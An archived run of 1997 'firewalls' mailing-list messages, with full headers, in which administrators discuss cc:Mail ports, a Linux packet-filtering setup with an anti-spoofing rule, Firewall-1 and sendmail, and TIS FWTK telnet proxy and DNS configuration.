---------------------------------------------------------------------- No need to turn out the light | Email: rammeri@winternet.co.at you feel so depressed inside | SMS: +436643552547@text.mobilkom.at when you think of all your | Phone: +43-664-3552547 wasted years at night | +43-7253-7697 ---------------------------------------------------------------------- From firewalls-owner Mon Jan 13 02:29:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA12849 for firewalls-outgoing; Mon, 13 Jan 1997 02:22:33 -0800 (PST) Received: from gatekeeper.ing.nl (gatekeeper.ing.nl [194.178.239.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA12841 for ; Mon, 13 Jan 1997 02:22:25 -0800 (PST) From: Robin.Pollard@mail.ing.nl Received: by ING-mailhub; id AA25016; Mon, 13 Jan 1997 11:23:03 +0100 X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002243427000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002243427000002*@MHS> To: firewalls Subject: Re: cc:Mail through a FireWall Date: Mon, 13 Jan 1997 11:18:21 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As yet I have not put it through a firewall but I can tell you cc:Mail listens on one of two ports: Port 21 - AAaargghhh ! was the original port they used (though they are not using FTP they are using their own protocol) You can test this by FTPing to a cc:Mail router, you won't get far but you get something. Port CC0 - This is a new option from some revision of V5.x router software (5.12 I think). With 5.x router you need the parameter PORTcc0 on the command line, if you use router 6.x then cc0 is default and you need to put PORT21 on the command line if you wish to use 21. Once it has contacted the listening router the calling router opens another high port. Here is a "netstat -A" from one of our multisession OS/2 routers which at the time is listening on port 21 with one session and communicating to another router on another. Active Internet connections PCB Proto Recv-Q Send-Q Local Address Foreign Address (state) 888a tcp 0 0 15.21.192.2.ftp 7.19.18.12.19493 TIME_WAIT 2d8a tcp 0 0 15.21.192.2.3785 7.19.27.25.ftp ESTABLISHED We use 21 for backward compatibility but this is internal net. Any one coming in from outside we would certainly force onto cc0. I don't know what rules the high port is assigned by, a little time with a packet sniffer could be in order soon. Cheers, Robin. ______________________________ Reply Separator _________________________________ Subject: cc:Mail through a FireWall Author: F:firewalls-owner@GreatCircle.COM_at_INET-1 at ASD1CCGW Date: 1/13/97 7:28 AM Please share your experience routing cc:Mail through a firewall. For instance, what port does it use? Thanks, Patrick From firewalls-owner Mon Jan 13 03:14:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14328 for firewalls-outgoing; Mon, 13 Jan 1997 02:44:57 -0800 (PST) Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id CAA14311 for ; Mon, 13 Jan 1997 02:44:46 -0800 (PST) Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id CAA04954; Mon, 13 Jan 1997 02:41:26 -0800 To: firewalls@GreatCircle.COM Path: cichlid From: robin.pollard@mail.ing.nl Newsgroups: mail.firewalls Subject: None Date: 13 Jan 1997 02:41:25 -0800 Lines: 63 Message-ID: <5bd3gl$api@cichlid.cichlid.com> NNTP-Posting-Host: cichlid.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: Lines: 53 Xdeliver: processed on Mon Jan 13 02:41:15 PST 1997 Xdeliver: SENDER firewalls-owner@greatcircle.com Xdeliver: to Xdeliver: cc Xdeliver: apparent_to Xdeliver: from robin.pollard@mail.ing.nl X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002243427000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002243427000002*@MHS> To: firewalls Subject: Re: cc:Mail through a FireWall Date: Mon, 13 Jan 1997 11:18:21 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As yet I have not put it through a firewall but I can tell you cc:Mail listens on one of two ports: Port 21 - AAaargghhh ! was the original port they used (though they are not using FTP they are using their own protocol) You can test this by FTPing to a cc:Mail router, you won't get far but you get something. Port CC0 - This is a new option from some revision of V5.x router software (5.12 I think). With 5.x router you need the parameter PORTcc0 on the command line, if you use router 6.x then cc0 is default and you need to put PORT21 on the command line if you wish to use 21. Once it has contacted the listening router the calling router opens another high port. Here is a "netstat -A" from one of our multisession OS/2 routers which at the time is listening on port 21 with one session and communicating to another router on another. Active Internet connections PCB Proto Recv-Q Send-Q Local Address Foreign Address (state) 888a tcp 0 0 15.21.192.2.ftp 7.19.18.12.19493 TIME_WAIT 2d8a tcp 0 0 15.21.192.2.3785 7.19.27.25.ftp ESTABLISHED We use 21 for backward compatibility but this is internal net. Any one coming in from outside we would certainly force onto cc0. I don't know what rules the high port is assigned by, a little time with a packet sniffer could be in order soon. Cheers, Robin. ______________________________ Reply Separator _________________________________ Subject: cc:Mail through a FireWall Author: F:firewalls-owner@GreatCircle.COM_at_INET-1 at ASD1CCGW Date: 1/13/97 7:28 AM Please share your experience routing cc:Mail through a firewall. For instance, what port does it use? Thanks, Patrick From firewalls-owner Mon Jan 13 05:36:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA21962 for firewalls-outgoing; Mon, 13 Jan 1997 05:01:23 -0800 (PST) Received: from macedonia.safhl.umn.edu (macedonia.safhl.umn.edu [128.101.165.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA21955 for ; Mon, 13 Jan 1997 05:01:15 -0800 (PST) Received: (from jgc@localhost) by macedonia.safhl.umn.edu (8.8.4/8.8.4) id GAA04604; Mon, 13 Jan 1997 06:59:54 -0600 (CST) Message-Id: <199701131259.GAA04604@macedonia.safhl.umn.edu> Subject: Re: Secure firewall with only Linux-Kernel filtering possible? To: rammeri@winternet.co.at, firewalls@greatcircle.com Date: Mon, 13 Jan 1997 06:59:54 -0600 (CST) From: "Jerry G. Champlin" In-Reply-To: <199701131655.RAA17194@winternet.co.at> from "rammeri@winternet.co.at" at Jan 13, 97 05:55:18 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk rammeri@winternet.co.at stated: > > > Assume the following situation: > > We are a company with 25 computer systems in a LAN, and with a 64k > connection > to the internet. > > So ... my question is ... is the following security-shema good or why > not? > > Our LAN is divided into several parts, so we use 192.168.0.0 - > 192.168.4.0 > for our internet network. > Between the router to the internet and the first local router, we have > a firewall-setup with only the linux-kernel-filtering/masquerading. > The firewall > allows any connections to be made from the internal-net. But > disallows any connection but a port 25 that will be forwarded to out > mail-host in the internal net (even this connection is limited to our > MX host). > The firewall disallows incoming ftp-data. > On the firewall there is NO daemon runnning, not even telnet for > administration > or sth. like this. I have subverted similar setups out of necessity by using procmail and or elm filters on the mail machine. You will want to make sure that you are running smrsh on the mail host and that you keep an eye on how people setup their mail handling. You do not want shell scripts, etc. to be executed on the mail host based on the content of mail messages unless it is absolutely necessary. Make sure the basic internet services your users use function properly to fit your needs or they will figure out a way to make things work by compromising your security from within. The other thing I would think about is how are you protecting against outbound sessions being hijacked while port ( data port in the case of ftp ) negotiation is in progress. -Jerry *************************************************************************** "If you plot a course of events like you plot murder, you'll be fine." -- M. Harvey *************************************************************************** From firewalls-owner Mon Jan 13 05:59:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA24379 for firewalls-outgoing; Mon, 13 Jan 1997 05:55:36 -0800 (PST) Received: from data.tops.net (data.tops.net [194.162.222.70]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA24328 for ; Mon, 13 Jan 1997 05:54:52 -0800 (PST) Received: from data.tops.net (armin@data.tops.net [194.162.222.70]) by data.tops.net (8.8.3/8.8.3) with SMTP id OAA29553; Sat, 13 Jan 1996 14:56:52 +0100 Date: Sat, 13 Jan 1996 14:56:51 +0100 (MET) From: armin To: rammeri@winternet.co.at cc: firewalls@GreatCircle.COM Subject: Re: Secure firewall with only Linux-Kernel filtering possible? In-Reply-To: <199701131655.RAA17194@winternet.co.at> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk additionally: - default policy for -I and -F (forward and incomming) should be deny - for the outside world: deny all ports < 1024, exept 25 (-F and -I) - make a rule like this to deny ip-spoofing: ipfwadm -F -S 0.0.0.0/0 -D 192.168.4.0/24 -V IP-addr_of_ya_router - same 4 other LAN addr, - same for -I - if not already done, turn of source-routing (kernel) - sit down a minute and think 'bout sendmail =:) (dont use < 8.8.4 ) best regards -armin ---------------------------------------------- |real_name: armin ollig e_mail: armin@tops.net| | | | Anthony's Law of Force: | | Don't force it; get a larger hammer. | ---------------------------------------------- On Mon, 13 Jan 1997 rammeri@winternet.co.at wrote: > > Assume the following situation: > > We are a company with 25 computer systems in a LAN, and with a 64k > connection > to the internet. > > So ... my question is ... is the following security-shema good or why > not? > > Our LAN is divided into several parts, so we use 192.168.0.0 - > 192.168.4.0 > for our internet network. > Between the router to the internet and the first local router, we have > a firewall-setup with only the linux-kernel-filtering/masquerading. > The firewall > allows any connections to be made from the internal-net. But > disallows any connection but a port 25 that will be forwarded to out > mail-host in the internal net (even this connection is limited to our > MX host). > The firewall disallows incoming ftp-data. > On the firewall there is NO daemon runnning, not even telnet for > administration > or sth. like this. > ... > Ok .. so tell me please, why is this setup insecure? > > thx, > ingo > > > > -- > ---------------------------------------------------------------------- > No need to turn out the light | Email: rammeri@winternet.co.at > you feel so depressed inside | SMS: +436643552547@text.mobilkom.at > when you think of all your | Phone: +43-664-3552547 > wasted years at night | +43-7253-7697 > ---------------------------------------------------------------------- > > > From firewalls-owner Mon Jan 13 06:29:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA25010 for firewalls-outgoing; Mon, 13 Jan 1997 06:04:14 -0800 (PST) Received: from mail.Germany.EU.net (mail.germany.eu.net [192.76.144.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA25003 for ; Mon, 13 Jan 1997 06:03:51 -0800 (PST) Received: by mail.Germany.EU.net with ESMTP (5.59+:34/EUnetD-2.6.1.h) via EUnet id PAA08649; Mon, 13 Jan 1997 15:03:20 +0100 Received: by mail.Munich.Germany.EU.net with UUCP (8.6.5:29/EUnetPoP-1.1.9) via EUnet id OAA12582; Mon, 13 Jan 1997 14:51:45 +0100 Received: by sunti1.sdm.de (Sendmail5.67a8/IDA-1.5) id AA27839; Mon, 13 Jan 1997 14:15:28 +0100 Received: from GATEWAY by sunti1 with netnews for firewalls@greatcircle.com (firewalls@greatcircle.com) To: firewalls@greatcircle.com Date: 13 Jan 1997 13:15:26 GMT From: pichel@sdm.de (Joerg Pichel) Message-Id: <5bdche$g91@sunti1.sdm.de> Organization: sd&m GmbH & Co. KG, Munich, Germany References: <3260f4f5.1934095@copley.fi.mckinsey.com> Reply-To: pichel@sdm.de Subject: Re: (fwd) Firewall-1 query Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Thu, 10 Oct 1996 07:01:50 +0100 (BST), Jon Whitton wrote: > > > >I have been looking at firewall-1 as a security solution and have one > >major query. > > > >It appears to work at the IP layer and basically allows or denys packets > >depending on certain rules. (This is only from the Checkpoint web site.) > > > >My question is how does this secure say sendmail since sendmail will be > >running directly on the firewall machine and not a proxy. > >Surely if sendmail is running on the firewall then when (not if!) a new > >bug is found in sendmail, this bug can just be exploited on the firewall. FW-1 doesn't secure sendmail in its protocol-layer (smtp). It just restricts who can speak smtp to whom. This _is_ unsecure regarding SMTP, of course. Use smapd from TIS-FWTK (for free) or wait for Firewall-1 Release 3.0 which comes with content security (filters SMTP-commands and viruses). J"org! -- J"org Pichel |s |d &|m | software design & management | | | | GmbH & Co. KG | | | | Thomas-Dehler-Str. 27 joerg.pichel@sdm.de | | | | 81737 Muenchen Tel/FAX: (089) 63812-112/150 From firewalls-owner Mon Jan 13 06:44:39 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA25623 for firewalls-outgoing; Mon, 13 Jan 1997 06:12:24 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA25612 for ; Mon, 13 Jan 1997 06:12:14 -0800 (PST) Received: from uucp5.UU.NET by relay5.UU.NET with SMTP (peer crosschecked as: uucp5.UU.NET [192.48.96.36]) id QQbyia21059; Mon, 13 Jan 1997 09:12:01 -0500 (EST) Received: from almserv.UUCP by uucp5.UU.NET with UUCP/RMAIL ; Mon, 13 Jan 1997 09:12:01 -0500 Received: from fanniemae.com (postman) by fnma.com (4.1/SMI-4.1) id AA17930; Mon, 13 Jan 97 09:04:39 EST Received: from bedrock.fanniemae.com by fanniemae.com (SMI-8.6/SMI-SVR4) id JAA04671; Mon, 13 Jan 1997 09:04:37 -0500 Received: from czar.fanniemae.com by bedrock.fanniemae.com (SMI-8.6/SMI-SVR4) id JAA18576; Mon, 13 Jan 1997 09:04:36 -0500 Received: from czar by czar.fanniemae.com (SMI-8.6/SMI-SVR4) id JAA29652; Mon, 13 Jan 1997 09:04:36 -0500 Message-Id: <199701131404.JAA29652@czar.fanniemae.com> X-Mailer: exmh version 2.0beta 12/23/96 Cc: "Gabriel Dura" To: firewalls@GreatCircle.com Subject: Re: FW-1 hacked? - Reply In-Reply-To: <199701101620.IAA19160@geocities.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 13 Jan 1997 09:04:35 -0500 From: Timothy L Hermans Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is the most ridiculous proof I have ever heard. Have you corroborated his story? How? What if I told you that there was a host called "hoover-wears-a-dress.fbi.gov". Would that be proof that I had hacked the FBI? Of course not. You'd have to hack in yourself to see. Looks like you and this "guy" are caught up in hacker-itis (ie. the idea that hacking the FBI makes everyone think you have big cojones). Figure out how to USE FW-1 competently and I'd be much more impressed. On Friday, Jan 10 "Gabriel Dura" wrote: > > There is a guy, working on his own, who claims he knows how to penetrate > FBI's firewall. > As a proof I was told that behind the firewall there is there is another > computer 'phi.fbi.gov'. > > > In the case of me being correctly informed and FBI is using FW-1 you have > an answer. > > > Hope it helps, > Gabriel Dura > dura@geocities.com > > > P.S. I can not guarantee the accuracy of this information and I can not > reveal the person who told me. > > > > ---------- > > From: mike > > To: firewalls@GreatCircle.COM > > Subject: FW-1 hacked? > > Date: miercuri, ianuarie 08, 1997 16:27 > > > > > Hi all > > Does anyone know if FW-1 was ever hacked? > > Tim Hermans FannieMae/MornetPlus Unix Engineering Group From firewalls-owner Mon Jan 13 06:59:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA28355 for firewalls-outgoing; Mon, 13 Jan 1997 06:57:31 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA28337 for ; Mon, 13 Jan 1997 06:57:19 -0800 (PST) Received: by smartwall.v-one.com; id JAA09628; Mon, 13 Jan 1997 09:57:07 -0500 (EST) Received: from securemail.v-one.com(10.6.0.6) by smartwall.v-one.com via smap (V3.1.1) id xma009622; Mon, 13 Jan 97 09:57:03 -0500 Received: (from csample@localhost) by securemail.v-one.com (8.7.4/8.7.3) id KAA15429; Mon, 13 Jan 1997 10:06:26 -0500 (EST) Date: Mon, 13 Jan 1997 10:06:25 -0500 (EST) From: char To: Jung Jun Lee cc: GreatCircle Subject: Re: How can I configure hidden DNS on TIS? In-Reply-To: <199701131209.VAA24418@kexin.kexin.co.kr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 13 Jan 1997, Jung Jun Lee wrote: > $)CHi.. > If I configure TIS to primary DNS, Can I use internal DNS for hidden? > > Thanks > > Of course this is a TIS customer support quetion... but you will need to build an internal primary DNS on another machine... the internal primary NS will slave forward to the Gauntlet. The Gauntlet has minimal names on it and point Gauntlet's /etc/resolv.conf to the internal nameserver char +---------------------------------------------------------------------------+ char sample /* that really is my name */ e-mail: char@v-one.com +---------------------------------------------------------------------------+ From firewalls-owner Mon Jan 13 07:14:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA27475 for firewalls-outgoing; Mon, 13 Jan 1997 06:46:42 -0800 (PST) Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA27426 for ; Mon, 13 Jan 1997 06:46:15 -0800 (PST) Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id WAA21602; Mon, 13 Jan 1997 22:44:57 -0800 Date: Mon, 13 Jan 1997 22:44:57 -0800 From: drexx@sunphil.mozcom.com (Dexter D. Laggui) Message-Id: <199701140644.WAA21602@sunphil.sunphil.mozcom.com> To: firewalls@greatcircle.com, fw-1-mailinglist@us.checkpoint.com Subject: TIS FWTK and Solstice FW-1 arguing X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello world, Jan. 13, 1996 (10:45pm Manila time) This is a case where the original Sys Admin who setup the old TIS Firewall Toolkit needs to be around. You see, with the following setup: +-------------+--[interior Cisco 2500]--[Solstice Firewall-1]-->Internet | | Windows TIS clients FWTK proxy & DNS server The TIS FWTK is configured as a telnet, mail, and ftp proxy server and also as the DNS server. It runs on a PC with FreeBSD. And managing it is like paying up one's dues in hell. (I know, the server design sucks...) With the Firewall-1 installed, we had a rule saying that FTP is allowed from anywhere to anywhere. But with the TIS FWTK having its say in the matter, we can't get FTP services! We can only have FTP services if we bypass the FTP proxy. Please advise me on how to even start making the two boxes work. Please? Most humble newbie, Drexx. "It's a dirty job, but somebody's gotta do it." -- John Wayne ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Division /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC. /_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++632) 813-6453 to 55 loc. 222 \_____\ \\ Fax: (++632) 813-3516 \_____\/ Email: drexx@sunphil.mozcom.com ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ From firewalls-owner Mon Jan 13 07:45:10 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA02988 for firewalls-outgoing; Mon, 13 Jan 1997 07:41:53 -0800 (PST) Received: from mx.globalsrv.com (mx.globalsrv.com [207.17.80.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA02980 for ; Mon, 13 Jan 1997 07:41:45 -0800 (PST) Received: (qmail 32429 invoked from smtpd); 13 Jan 1997 16:41:48 -0000 Received: from pineal.encephalon.com (208.199.232.82) by mx.globalsrv.com with SMTP; 13 Jan 1997 16:41:48 -0000 Message-ID: <32DA57DA.2781@encephalon.com> Date: Mon, 13 Jan 1997 09:42:18 -0600 From: Joel Colvin Organization: Colvin Training & Consulting X-Mailer: Mozilla 3.01Gold (X11; I; SCO_SV 3.2 i386) MIME-Version: 1.0 To: char CC: Firewalls Mailing List Subject: Re: tn-gw problems References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm going from inside the firewall out to the internet. Currently I am using the following line to only allow tests from the firewall but I get the same result when I add an appropriate IP address from inside and try from that host. tn-gw: permit-hosts 127.0.0.1 This is what I get when I try: $ telnet localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. pineal.encephalon.com telnet proxy (Version V2.0beta) ready: tn-gw-> Connection closed by foreign host. I have also tried without using netacl and manual starting tn-gw with the same result. It sure feels like a config problem but I am at a loss for what's wrong. -- Joel char wrote: > > You failed to mention are you going from out to in or in to out > > If you are going in to out remember to enter the line > tn-gw: permit-hosts xxx.xxx.xxx.xxx > (where xxx.xxx.xxx.xxx is the internal host you are allowing through) > > If the host is out to in: > > tn-gw: permit-hosts yyy.yyy.yyy.yyyy -auth > > If you are still having problems let me know... > > char > > > +---------------------------------------------------------------------------+ > char sample /* that really is my name */ > e-mail: char@v-one.com > +---------------------------------------------------------------------------+ From firewalls-owner Mon Jan 13 07:59:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03490 for firewalls-outgoing; Mon, 13 Jan 1997 07:47:07 -0800 (PST) Received: from wormhole.tds.de (wormhole.tds.de [193.28.100.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03460 for ; Mon, 13 Jan 1997 07:46:52 -0800 (PST) Received: (from uucp@localhost) by wormhole.tds.de (8.8.0/8.6.9) id QAA03528 for ; Mon, 13 Jan 1997 16:43:16 +0100 Received: from nv6000x.hn.tds.de(193.28.102.69) by wormhole.hn.tds.de via smap (V2.0beta) id xma003522; Mon, 13 Jan 97 16:43:03 +0100 Message-ID: <32DA57A2.15FB@dat.tds.de> Date: Mon, 13 Jan 1997 16:41:22 +0100 From: Christopher Tighe Organization: Tele-Daten Service GmbH X-Mailer: Mozilla 3.01 (X11; I; AIX 2) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: tcp port 5510 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi does anyone know what tcp port 5510 is used for, or where I can find it out? - it is not listed in rfc 1700. cheers chris -- +------------------------------------------------------------+ | Christopher Tighe BSc. CCIE. Tel: ++49 (0)7131 6235-119 | | Network Services Fax: ++49 (0)7131 6235-115 | | tele-daten service GmbH E-Mail: ctighe@tds.de | | Titotstr. 7-9 | | 74072 Heilbronn \"""/ | | Germany (o o) | +------------------------------------.ooO(_)Ooo.-------------+ From firewalls-owner Mon Jan 13 08:14:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA05418 for firewalls-outgoing; Mon, 13 Jan 1997 08:10:16 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA05394 for ; Mon, 13 Jan 1997 08:09:56 -0800 (PST) Received: by smartwall.v-one.com; id LAA11141; Mon, 13 Jan 1997 11:09:40 -0500 (EST) Received: from securemail.v-one.com(10.6.0.6) by smartwall.v-one.com via smap (V3.1.1) id xma011131; Mon, 13 Jan 97 11:09:17 -0500 Received: (from csample@localhost) by securemail.v-one.com (8.7.4/8.7.3) id LAA15902; Mon, 13 Jan 1997 11:18:41 -0500 (EST) Date: Mon, 13 Jan 1997 11:18:39 -0500 (EST) From: char To: Joel Colvin cc: Firewalls Mailing List Subject: Re: tn-gw problems In-Reply-To: <32DA57DA.2781@encephalon.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 13 Jan 1997, Joel Colvin wrote: > I'm going from inside the firewall out to the internet. Currently I am > using the following line to only allow tests from the firewall but I get > the same result when I add an appropriate IP address from inside and try > from that host. > > tn-gw: permit-hosts 127.0.0.1 > > > This is what I get when I try: > > $ telnet localhost > Trying 127.0.0.1... > Connected to localhost. > Escape character is '^]'. > pineal.encephalon.com telnet proxy (Version V2.0beta) ready: > tn-gw-> Connection closed by foreign host. > > I have also tried without using netacl and manual starting tn-gw with > the same result. It sure feels like a config problem but I am at a loss > for what's wrong. Indeed this does sound like a config problem... anything meaningful in your syslog files? Are you running the tn-gw out of rc.local or /etc/inetd.conf if so any chance that you could relay the info. If you are running out of rc.local does it indicate the path /usr/local/etc/netacl > What you really want to do hear is have the TCP wrapper running then specify within the confines of the netacl which proxy you intend on running. I Also a side note... in some versions of fwtk for trusted hosts you will need to specify tn-gw: permit-hosts xxx.xxx.xxx.xxx -unauth Don't know if any of this helps... let me know please char +---------------------------------------------------------------------------+ char sample /* that really is my name */ e-mail: char@v-one.com +---------------------------------------------------------------------------+ From firewalls-owner Mon Jan 13 09:14:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10297 for firewalls-outgoing; Mon, 13 Jan 1997 08:52:47 -0800 (PST) Received: from mail.dserve.net ([207.108.135.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10290 for ; Mon, 13 Jan 1997 08:52:38 -0800 (PST) Received: from mail ([207.115.134.169]) by mail.dserve.net (Netscape Mail Server v2.02) with ESMTP id AAA218 for ; Mon, 13 Jan 1997 09:49:28 -0700 Message-ID: <32DA4AF7.6EED@dserve.net> Date: Mon, 13 Jan 1997 06:47:19 -0800 From: "Eric C. Rodziewicz" X-Sender: "Eric C. Rodziewicz" X-Mailer: Mozilla 4.0b1 (WinNT; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: ON Tech's FW X-Priority: Normal Content-Type: multipart/alternative; boundary="----------6F4AA3212164" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------6F4AA3212164 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Any comments on this FW. ------------6F4AA3212164 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
Any comments on this FW.
 
------------6F4AA3212164-- From firewalls-owner Mon Jan 13 09:15:05 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA07457 for firewalls-outgoing; Mon, 13 Jan 1997 08:31:15 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA07309 for ; Mon, 13 Jan 1997 08:30:32 -0800 (PST) Message-Id: <199701131630.IAA07309@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA005172965; Tue, 14 Jan 1997 03:29:26 +1100 From: Darren Reed Subject: Re: TIS FWTK and Solstice FW-1 arguing To: drexx@sunphil.mozcom.com (Dexter D. Laggui) Date: Tue, 14 Jan 1997 03:29:25 +1100 (EDT) Cc: firewalls@GreatCircle.COM, fw-1-mailinglist@us.checkpoint.com In-Reply-To: <199701140644.WAA21602@sunphil.sunphil.mozcom.com> from "Dexter D. Laggui" at Jan 13, 97 10:44:57 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Dexter D. Laggui, sie said: > > Hello world, Jan. 13, 1996 (10:45pm Manila time) > > This is a case where the original Sys Admin who setup the old TIS > Firewall Toolkit needs to be around. You see, with the following setup: > > +-------------+--[interior Cisco 2500]--[Solstice Firewall-1]-->Internet > | | > Windows TIS > clients FWTK > proxy & DNS server > > The TIS FWTK is configured as a telnet, mail, and ftp proxy server and > also as the DNS server. It runs on a PC with FreeBSD. And managing it is > like paying up one's dues in hell. (I know, the server design sucks...) > > With the Firewall-1 installed, we had a rule saying that FTP is allowed > from anywhere to anywhere. But with the TIS FWTK having its say in the > matter, we can't get FTP services! We can only have FTP services if we > bypass the FTP proxy. > > Please advise me on how to even start making the two boxes work. Please? This is a FW-1 bug. A patch from Checkpoint should be available. Or you might hack ft-gw to work around the FW-1 bug. Darren From firewalls-owner Mon Jan 13 09:29:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA07936 for firewalls-outgoing; Mon, 13 Jan 1997 08:35:11 -0800 (PST) Received: from marsi. (mars.mediaone.net [207.120.78.115]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA07920 for ; Mon, 13 Jan 1997 08:35:01 -0800 (PST) Received: from northstar.mediaone.com by marsi. (SMI-8.6/SMI-SVR4) id LAA01247; Mon, 13 Jan 1997 11:33:48 -0500 Received: from mahimahi ([10.1.2.212]) by northstar.mediaone.com (Netscape Mail Server v1.1) with ESMTP id AAA109 for ; Mon, 13 Jan 1997 11:35:48 -0500 Message-ID: <32DA63EE.78C6@mediaone.net> Date: Mon, 13 Jan 1997 11:33:50 -0500 From: epimntl@mediaone.net (Ed Pimentel) Reply-To: epimntl@mediaone.net Organization: MediaOne X-Sender: Ed Pimentel X-Mailer: Mozilla 4.0b1 (WinNT; I) MIME-Version: 1.0 To: firewalls-digest@GreatCircle.COM Subject: What is the percentages of Internet Service Providers that use external firewall. X-Priority: Normal Content-Type: multipart/alternative; boundary="----------7AFB6A0836153" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------7AFB6A0836153 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Are there any public figures that show the percentage of ISP that use external firewalls. Most everyone uses firewalls to guard their internal LAN, however some ISP believe that external firewalls may not be necessary. ------------7AFB6A0836153 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
                 Are there any public figures that show the percentage of ISP
                 that use external firewalls. Most everyone uses firewalls to
                 guard their internal LAN, however some ISP believe that
                 external firewalls may not be necessary.
 
 
 
    
